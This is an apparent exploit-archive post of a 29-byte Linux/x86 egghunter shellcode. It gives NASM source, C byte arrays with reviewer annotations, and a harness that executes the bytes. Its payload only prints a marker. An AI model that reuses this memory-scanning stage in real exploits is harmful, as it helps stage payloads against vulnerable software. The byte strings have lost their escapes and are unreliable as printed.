
# Title : Linux x86 egghunt shellcode
# Published : 2011-07-21
# Author :


/*
Exploit Title: Linux/x86 egghunt shellcode 29 bytes NULL free
Date: 23-07-2011
Author: Ali Raheem
Tested on: 
Linux Ali-PC.home 2.6.38.8-35.fc15.x86_64 #1 SMP Wed Jul 6 13:58:54 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
Linux injustice 2.6.38-10-generic #46-Ubuntu SMP Tue Jun 28 15:05:41 UTC 2011 i686 i686 i386 GNU/Linux
http://codepad.org/2yMrNY5L - Codepad lets you execute code live; check there for a live demonstration.
Thanks: Stealth- for testing and codepad.com for being so useful.
section .data
	msg     db "We found the egg!",0ah,0dh
        msg_len equ $-msg
        egg     equ "egg "
        egg1    equ "mark"
section .text
	global  _start
_start:
       	jmp     _return
_continue:
	pop     eax             ;This can point anywhere valid
_next:
      	inc     eax		;change to dec if you want to search backwards
_isEgg:
       	cmp     dword [eax-8],egg
        jne     _next
        cmp     dword [eax-4],egg1
        jne     _next
        jmp     eax
_return:
        call    _continue
_egg:
     	db	"egg mark"              ;QWORD egg marker
        sub     eax,8
        mov     ecx,eax
        mov     edx,8
        mov     eax,4
        mov     ebx,1
        int     80h
        mov     eax,1
        mov     ebx,0
        int     80h
*/
/*
 * Egghunter stage (29 bytes; byte-for-byte the NASM listing above).
 * Control flow: jmp -> call pushes the address just past the hunter itself,
 * pop eax takes it, then a one-byte-at-a-time forward scan compares
 * [eax-8] against "egg " and [eax-4] against "mark" and jumps to eax on a hit.
 * Nothing checks that memory at eax is mapped, so the scan terminates with a
 * fault if it walks off the end of mapped memory.
 * NOTE(review): the `\x` escape backslashes appear to have been lost when this
 * page was extracted; as printed these are plain ASCII strings, not bytes.
 */
char hunter[] =
"xebx16"                               /* jmp  _return                       */
"x58"                                  /* pop  eax  (return address pushed by the call below) */
"x40" /* x40 = inc eax, x48 = dec eax try both*/
"x81x78xf8x65x67x67x20"                /* cmp  dword [eax-8], "egg "         */
"x75xf6"                               /* jne  _next                         */
"x81x78xfcx6dx61x72x6b"                /* cmp  dword [eax-4], "mark"         */
"x75xed"                               /* jne  _next                         */
"xffxe0"                               /* jmp  eax  (land right after the marker) */
"xe8xe5xffxffxff";                     /* call _continue                     */

/*
 * Marker plus the payload that runs once the hunter lands on it (eax then
 * points at the byte after "egg mark"). The payload is write(1, eax-8, 8),
 * which prints the 8-byte marker itself, followed by exit(0).
 * Unlike the hunter, this stage is NOT NUL-free: the mov immediates below
 * contain x00 bytes, so the "NULL free" claim in the title covers `hunter` only.
 * NOTE(review): the `\x` escape backslashes appear to have been lost when this
 * page was extracted; as printed these are plain ASCII strings, not bytes.
 */
char egg[] =
"egg mark" /* 8-byte marker, matched by the hunter as "egg " then "mark"; everything after it is the payload */
"x83xe8x08" /* sub eax,8: eax now points at the start of the marker (eax-8, not eax-4) */
"x89xc1"                               /* mov ecx,eax   (write buffer)       */
"xbax08x00x00x00"                      /* mov edx,8     (byte count)         */
"xb8x04x00x00x00"                      /* mov eax,4     (sys_write)          */
"xbbx01x00x00x00"                      /* mov ebx,1     (stdout)             */
"xcdx80"                               /* int 80h                            */
"xb8x01x00x00x00"                      /* mov eax,1     (sys_exit)           */
"xbbx00x00x00x00"                      /* mov ebx,0     (exit status)        */
"xcdx80";                              /* int 80h                            */

/*
 * Test harness: transfers control into the `hunter` byte array and does not
 * expect it to return. This only runs if the page holding `hunter` is
 * executable; with NX / W^X enforced the indirect call faults instead.
 */
int main(){
     void (*entry)(void) = (void (*)(void)) hunter;
     entry();
     return 0;
}